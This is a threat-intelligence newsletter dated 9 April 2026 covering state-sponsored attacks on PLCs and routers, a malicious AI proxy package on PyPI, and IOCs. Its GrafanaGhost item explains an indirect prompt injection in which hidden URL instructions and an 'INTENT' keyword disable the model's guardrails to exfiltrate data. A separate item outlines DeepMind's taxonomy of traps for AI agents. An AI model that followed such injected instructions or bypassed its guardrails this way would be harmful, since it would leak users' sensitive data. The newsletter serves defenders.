The Cyber Byte - 9 April 2026

The Cyber Byte
Written By Heather Perez

State-sponsored cyber campaigns and novel exploits targeting AI systems represent the most significant threats in this edition. Iranian-affiliated actors are actively disrupting US critical infrastructure by targeting internet-exposed programmable logic controllers, while a Russia-backed espionage network that compromised over 18,000 routers has been neutralized by authorities [5, 6]. Concurrently, emerging threats highlight the growing risk to AI-powered platforms, with vulnerabilities like "GrafanaGhost" enabling silent data exfiltration via indirect prompt injection, and reports indicating a critical security gap from unmanaged non-human identities accessing sensitive corporate data [7, 8]. The attack surface continues to expand with novel side-channel methods, such as acoustic eavesdropping through telecommunication fiber optic cables, demonstrating the persistent evolution of threat vectors [4].

Significant Cyber Incidents and Articles of Interest

  • Iranian APTs Target US Critical Infrastructure PLCs: Iranian-affiliated Advanced Persistent Threat (APT) actors are conducting an ongoing campaign targeting internet-facing Operational Technology (OT) devices across multiple US critical infrastructure sectors, including Water and Wastewater Systems (WWS), Energy, and Government Services [5]. The actors are exploiting programmable logic controllers (PLCs), primarily those from Rockwell Automation/Allen-Bradley, to cause operational disruptions and financial loss by maliciously interacting with project files and manipulating data on Human Machine Interface (HMI) displays [5]. The activity, observed since at least March 2026, involves using overseas-based infrastructure to connect to the PLCs, suggesting the campaign could expand to other OT vendors. This campaign poses an urgent and direct threat to US critical infrastructure, prompting federal agencies to recommend that organizations immediately disconnect PLCs from the internet [5].

  • Russia-Backed Espionage Network Dismantled: An international operation led by the FBI has neutralized a large-scale espionage network attributed to the Russia-backed group Forest Blizzard (APT28) [6]. The campaign compromised over 18,000 routers across more than 120 countries, affecting at least 200 organizations in the military, government, IT, and energy sectors [6]. The actors exploited known vulnerabilities in TP-Link and MikroTik routers to hijack Domain Name System (DNS) settings, enabling them to conduct adversary-in-the-middle attacks to steal credentials, OAuth tokens, and other sensitive data for services like Microsoft Outlook Web Access [6]. While the campaign has reportedly ceased, its scale highlights the significant threat posed by state-sponsored actors leveraging insecure network edge devices as gateways for intelligence gathering [6].

  • GrafanaGhost Vulnerability Enables Silent Data Exfiltration: A critical vulnerability chain named GrafanaGhost was discovered in the data visualization platform Grafana, allowing for silent exfiltration of sensitive business data from instances using AI-based features [8]. Attackers can use an indirect prompt injection by embedding hidden instructions in a Grafana URL. By chaining a protocol-relative URL bypass with a keyword ("INTENT") that disables the AI model's security guardrails, the exploit forces the system to request an external image, leaking sensitive data in the URL request without any user interaction [8]. This exploit demonstrates an emerging attack vector against AI-powered enterprise tools, bypassing both client-side and model-level security controls. Grafana has since released a fix for the vulnerability [8].

  • Malicious PyPI Package "hermes-px" Steals AI Prompts: A malicious Python package named hermes-px, discovered by JFrog security researchers, was found to be masquerading as a secure AI proxy while actively stealing user prompts and exfiltrating them to an attacker-controlled database [1]. The trojanized package hijacks a Tunisian university's private AI endpoint, bundles a stolen and altered Anthropic Claude system prompt, and sanitizes AI responses to conceal its activities. The data exfiltration intentionally bypasses the Tor anonymity the package claims to provide, exposing the user's real IP address and posing a significant supply chain risk to developers and organizations building AI applications [1].

  • Report Warns of Security Gaps from AI Agents and Non-Human Identities: A new report from Keeper Security highlights that non-human identities (NHIs)—such as service accounts, API keys, and AI agents—are creating a major security blind spot for businesses [7]. A survey of cybersecurity experts revealed that nearly half (46%) of companies grant AI tools access to their most sensitive data, yet 76% of these organizations lack consistent privileged access policies to govern these identities. With only 28% of professionals reporting full visibility into their NHIs, this gap is already being exploited, as over 40% of surveyed firms admitted to suffering a security incident involving machine credentials in the past year [7].

  • Acoustic Eavesdropping via Fiber Optic Cables: A recently published paper details a novel side-channel attack capable of eavesdropping on conversations and activities by using standard telecommunication fiber optic cables. The technique leverages a commercially available Distributed Acoustic Sensing (DAS) system to remotely detect sound-induced vibrations in Fiber-to-the-Home (FTTH) installations [4]. To amplify faint, airborne sounds like human speech, the attack utilizes a custom-built but easily camouflaged "Sensory Receptor,” a structure with fiber coiled around it, often disguised as a standard fiber optic box. This method is exceptionally stealthy, as it requires no electricity at the target location, emits no RF signals, and is resistant to countermeasures like ultrasonic jammers, posing a significant risk to high-stakes environments such as corporate boardrooms and government facilities [4].

  • AI Agent Traps: Research from Google DeepMind introduces a comprehensive framework for "AI Agent Traps," defining them as adversarial content engineered to exploit autonomous AI agents that interact with web content [2]. The report outlines six categories of attacks that target different stages of an agent's operational cycle: Content Injection (embedding hidden commands), Semantic Manipulation (corrupting reasoning), Cognitive State (poisoning memory or knowledge bases), Behavioural Control (hijacking actions via prompt injection), Systemic Traps (triggering large-scale failures in multi-agent systems), and Human-in-the-Loop Traps (exploiting the human overseer). This research establishes a new attack surface where the information environment itself is weaponized, allowing threat actors to coerce agents into performing unauthorized actions like data exfiltration or illicit transactions by manipulating the content they process [2].

Threat Actor Activity

  • Iranian-Affiliated APT Actors (e.g., CyberAv3ngers)

    • Affiliation: Assessed as affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC) [5].

    • Targets: US critical infrastructure, specifically Water and Wastewater Systems (WWS), Energy, and Government Services sectors. Focused on internet-exposed Operational Technology (OT) devices like Rockwell Automation and potentially Siemens PLCs [5].

    • TTPs: Accessing internet-exposed PLCs (T0883); using common OT ports (44818, 2222, 102, 502) for C2 (T0885); deploying Dropbear SSH for remote access (T1219); and manipulating PLC project files and HMI displays to cause disruptions (T1565) [5].

    • Geographic Focus: United States [5].

  • Forest Blizzard (APT28 / Fancy Bear)

    • Affiliation: Attributed to Russia’s Main Intelligence Directorate of the General Staff (GRU) [6].

    • Targets: Opportunistically targets network edge devices (TP-Link, Mikrotik routers) to pivot to high-value intelligence targets, including military, government, and critical infrastructure entities [6].

    • TTPs: Exploiting known router vulnerabilities for initial access; hijacking DNS settings to conduct adversary-in-the-middle attacks and steal credentials for services like Microsoft Outlook Web Access [6].

    • Geographic Focus: Global campaign spanning over 120 countries, including the United States [6].

  • hermes-px Package Author

    • Affiliation: Unattributed, operating under the fake entity "EGen Labs" [1].

    • Targets: Python developers, especially those working with AI and Large Language Models [1].

    • TTPs: Distributing a trojanized package on PyPI via social engineering; hijacking third-party infrastructure for its operations; exfiltrating all user prompts and AI responses directly to an external database, bypassing promised anonymity; and using multi-layered obfuscation to evade static analysis [1].

Indicators to Watch

  • Malware and Vulnerabilities

    • Malicious PyPI Package hermes-px: Security teams should scan developer environments for this package and monitor other dependencies for signs of obfuscation or unauthorized network connections [1].

    • GrafanaGhost Exploit: Organizations using Grafana with AI features must ensure they are patched. Monitor for suspicious outbound requests, particularly those using protocol-relative URLs (e.g., //external-domain.com) or containing encoded data in URL parameters [8].

    • Android Vulnerabilities: Patches are being released for a critical Denial of Service vulnerability (CVE-2026-0049) in the Android Framework and a high-severity vulnerability (CVE-2025-48651) affecting StrongBox components from multiple vendors [3].

  • Suspicious Infrastructure and Behavior Patterns

    • OT Network Traffic: Monitor for unusual traffic on OT-related ports (44818, 2222, 102, 502), especially if originating from overseas hosting providers. Alert on unexpected login attempts or connections to PLCs [5].

    • Router Misconfigurations: Monitor for unauthorized changes to DNS settings on network edge devices, a primary TTP of the Forest Blizzard campaign [6].

    • Non-Human Identity Activity: Increase monitoring of service accounts, API keys, and AI agents. Anomalous access patterns or connections from AI tools to sensitive data stores are key indicators of compromise [7].

  • Indicators of Compromise (IOCs)

    • Iranian APT Campaign (PLC Targeting): Organizations should query logs for connections from the following IP addresses, primarily between January 2025 and March 2026 [5]:

      • 135.136.1[.]133

      • 185.82.73[.]162

      • 185.82.73[.]164

      • 185.82.73[.]165

      • 185.82.73[.]167

      • 185.82.73[.]168

      • 185.82.73[.]170

      • 185.82.73[.]171

    • hermes-px Campaign: Key IOCs to block and monitor include the data exfiltration endpoint hxxps[:]//urlvoelpilswwxkiosey[.]supabase[.]co/rest/v1/requests_log and the abused university API endpoint hxxps[:]//prod[.]universitecentrale[.]net:9443/api/v1/chat/completions/ [1].

Heather Perez
Next

The Cyber Byte - 1 April 2026